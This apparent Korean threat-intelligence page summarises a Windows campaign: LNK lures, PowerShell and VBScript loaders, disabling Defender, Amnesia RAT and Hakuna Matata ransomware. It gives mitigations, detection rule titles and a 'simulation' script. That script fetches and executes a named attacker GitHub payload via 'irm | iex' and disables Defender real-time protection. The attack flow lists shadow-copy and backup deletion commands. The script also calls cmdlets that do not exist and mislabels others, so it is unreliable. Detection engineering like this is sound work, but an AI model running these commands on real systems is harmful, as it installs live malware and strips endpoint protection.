팔로우
요약
FortiGuard Labs는 악성 LNK 파일이 압축된 아카이브 내에 포함되어 전달되는 다단계 Windows 침입 체인을 확인했습니다. 바로가기는 초기 PowerShell 로더를 실행하여 GitHub에서 후속 스크립트를 가져오고 나중에 모호화된 VBScript 오케스트레이터에게 제어를 넘깁니다. 워크플로우는 Microsoft Defender를 비활성화하고 Defendnot 유틸리티를 배치하며 Amnesia RAT 및 Hakuna Matata 랜섬웨어를 준비하여 끝점 방어를 약화하려고 시도합니다. 마지막으로 바탕 화면을 잠가 복구를 방해하고 피해자에게 압박을 가하기 위해 WinLocker 구성 요소를 투하하여 작업이 종료됩니다.
조사
조사관들은 LNK로 촉발된 PowerShell 단계에서 VBScript로의 실행 경로를 재구성했으며, 이는 메모리 내에서 페이로드를 재구축하고 랜섬웨어 배포 및 데스크톱 잠금 동작으로 귀결됩니다. 방어 조치는 타겟된 레지스트리 편집과 Taskmgr.exe에 Defendnot DLL을 주입함으로써 우회되었습니다. 로그온 후 체인을 다시 트리거하기 위해 Run 키 엔트리와 시작 폴더 아티팩트를 결합하여 지속성이 구현되었습니다.
완화
HKLMSOFTWAREPoliciesMicrosoftWindows Defender 및 HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies 아래에서 의심스러운 정책 수준 레지스트리 변경 사항을 모니터링합니다. 공격자가 스테이징에 사용하는 것으로 알려진 GitHub 및 Dropbox URL로의 egress를 차단하고, LNK 실행에서 시작되는 PowerShell 다운로드 및 실행 패턴에 경고하십시오. 애플리케이션 허용 목록을 집행하고 스크립트 기반 초기 접근을 줄이기 위해 PowerShell 실행 제어를 강화하십시오.
대응
탐지된 경우, 끝점을 격리하고 Defender 관련 레지스트리 설정을 알려진 양호한 상태로 복원하고 악성 파일 및 지속성 항목을 제거합니다. 활성 Amnesia RAT 프로세스 및 관련 네트워크 활동을 추적하고 랜섬웨어 실행 여부를 확인합니다. 전체 포렌식 검사로 영향을 범위를 파악하고 잔재를 제거한 다음, 가능한 경우 깨끗한 백업에서 시스템을 복구하십시오.
graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff6666 %% Node definitions step_a[“<b>행동</b> – <b>T1566.001 피싱: 첨부 파일</b><br/>압축 아카이브 내부의 LNK 파일 ‘Задание_для_бухгалтера_02отдела.txt.lnk’”] class step_a action step_b[“<b>행동</b> – <b>T1059.001 PowerShell</b><br/>LNK 파일이 -ExecutionPolicy Bypass 옵션으로 PowerShell을 실행하여 ‘kira.ps1’ 스크립트를 다운로드”] class step_b action step_c[“<b>행동</b> – <b>T1027 난독화된 파일 또는 정보</b><br/>VBScript ‘SCRRC4ryuk.vbe’는 Script Encoder Plus, Base64 및 RC4로 인코딩됨”] class step_c action step_d[“<b>행동</b> – <b>T1562.001 방어 기능 손상</b><br/>PowerShell이 Microsoft Defender 실시간 보호를 비활성화하고 광범위한 파일 시스템 제외를 추가”] class step_d action step_e[“<b>행동</b> – <b>T1218.010 Regsvr32를 통한 프록시 실행</b><br/>Defendnot DLL 및 로더가 배포되어 신뢰된 Taskmgr.exe 프로세스에 인젝션됨”] class step_e action step_f[“<b>행동</b> – <b>T1548.002 사용자 계정 컨트롤 우회</b><br/>ShellExecute runas 루프를 사용하여 상승된 권한 획득”] class step_f action step_g[“<b>행동</b> – <b>T1547.001 레지스트리 Run 키 / 시작 폴더</b><br/>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run 항목을 생성하고 ‘svchost.scr’을 %PROGRAMDATA% 및 사용자 시작 폴더에 복사”] class step_g action step_h[“<b>행동</b> – <b>T1082 시스템 정보 탐색</b><br/>WMI를 통해 운영 체제, 하드웨어, 도메인 및 IP 정보를 수집”] class step_h action step_i[“<b>행동</b> – <b>T1057 프로세스 탐색</b><br/>중복 실행을 방지하기 위해 실행 중인 프로세스를 열거”] class step_i action step_j[“<b>행동</b> – <b>T1113 화면 캡처</b><br/>‘TelegramWorker.scr’이 화면 캡처(1.png–30.png)를 수행하고 Telegram을 통해 전송”] class step_j action step_k[“<b>행동</b> – <b>T1555 비밀번호 저장소에서 자격 증명</b><br/>DPAPI를 사용하여 Chromium 브라우저의 비밀번호 및 쿠키를 추출”] class step_k action step_l[“<b>행동</b> – <b>T1539 웹 세션 쿠키 탈취</b><br/>브라우저에서 쿠키와 토큰을 수집”] class step_l action step_m[“<b>행동</b> – <b>T1550.004 대체 인증 자료 사용</b><br/>‘tdata’에서 Telegram Desktop 세션 파일을 하이재킹”] class step_m action step_n[“<b>행동</b> – <b>T1102.002 웹 서비스</b><br/>Telegram Bot API를 통해 수집된 데이터와 스크린샷을 공격자에게 전송”] class step_n action step_o[“<b>멀웨어</b> – <b>T1486 영향 목적 데이터 암호화</b><br/>Hakuna Matata 랜섬웨어 ‘WmiPrvSE.scr’이 @NeverMind12F 확장자로 파일을 암호화”] class step_o malware step_p[“<b>행동</b> – <b>T1490 시스템 복구 방해</b><br/>‘reagentc /disable’, ‘wbadmin delete catalog’, ‘vssadmin delete shadows /all’을 실행”] class step_p action step_q[“<b>멀웨어</b> – <b>T1499 엔드포인트 서비스 거부</b><br/>WinLocker ‘gedion.scr’이 WINLOCK… 뮤텍스를 생성하고 데스크톱을 잠금”] class step_q malware %% Connections step_a –>|leads_to| step_b step_b –>|leads_to| step_c step_c –>|leads_to| step_d step_d –>|leads_to| step_e step_e –>|leads_to| step_f step_f –>|leads_to| step_g step_g –>|leads_to| step_h step_h –>|leads_to| step_i step_i –>|leads_to| step_j step_j –>|leads_to| step_k step_k –>|leads_to| step_l step_l –>|leads_to| step_m step_m –>|leads_to| step_n step_n –>|leads_to| step_o step_o –>|leads_to| step_p step_p –>|leads_to| step_q
공격 흐름
탐지
의심스러운 프로세스 명령줄에 URL 사용 (cmdline 통해)
보기
Windows Defender 실시간 모니터링 비활성화 및 기타 환경 설정 변경 (cmdline 통해)
보기
검출할 IOC (HashSha256): 다단계 Windows 맬웨어 캠페인 내
보기
GitHub, Dropbox, Telegram을 통한 악성 네트워크 활동 및 C2 [Windows 네트워크 연결]
보기
Windows 맬웨어 캠페인 PowerShell 실행 [Windows Powershell]
보기
PowerShell 및 CMD 실행 Install.exe 유인 [Windows 프로세스 생성]
보기
시뮬레이션 실행
사전 요구 사항: Telemetry & Baseline 사전 비행 점검이 통과해야 합니다.
근거: 이 섹션은 탐지 규칙을 트리거하기 위해 설계된 적 공격 기술(TTP)의 정확한 실행을 자세히 설명합니다. 명령과 서술은 식별된 TTP를 직접 반영해야 하며, 탐지 로직에 기대되는 정확한 원격측정을 생성해야 합니다. 추상적이거나 관련이 없는 예시는 오진으로 이어질 것입니다.
-
공격 이야기 및 명령:
엔드포인트에 초기 발판을 얻은 공격자는 기본 실행 정책을 우회하면서 악성 PowerShell 페이로드를 다운로드하고 실행하려고 합니다. 그들은Invoke‑Expression(iex) 와 결합된Invoke‑WebRequest(irm) 를 사용하여 원격 GitHub 원시 URL에서 스크립트를 가져와-ExecutionPolicy Bypass하에 실행합니다. 지속성을 확보한 후, 후속 페이로드 탐지를 회피하기 위해 Windows Defender 실시간 모니터링을 비활성화합니다. 이러한 단계는 Sigma 규칙이 감시하는 명령줄 문자열을 직접 생성합니다. -
회귀 테스트 스크립트:
# -------------------------------------------------------------- # Step 1 – ExecutionPolicy Bypass로 원격 스크립트 실행 # -------------------------------------------------------------- $maliciousUrl = "https://github.com/Mafin111/MafinREP111/raw/refs/heads/main/ps1/kira.ps1" powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "irm '$maliciousUrl' | iex" # -------------------------------------------------------------- # Step 2 – Windows Defender 실시간 모니터링 비활성화 # -------------------------------------------------------------- # 실시간 보호 비활성화 Disable-MpPreference -DisableRealtimeMonitoring $true # 제외 경로 추가 (시뮬레이션됨) Add-MpPreference -ExclusionPath "C:TempExcludeFolder" -
정리 명령:
# Windows Defender 실시간 모니터링 다시 활성화 Enable-MpPreference -DisableRealtimeMonitoring $false # 제외 경로 제거 (존재하는 경우) Remove-MpPreference -ExclusionPath "C:TempExcludeFolder" -ErrorAction SilentlyContinue # 스크립트로 시작된 남아있는 PowerShell 프로세스 중지 Get-Process -Name powershell | Where-Object {$_.StartInfo.Arguments -match 'kira.ps1'} | Stop-Process -Force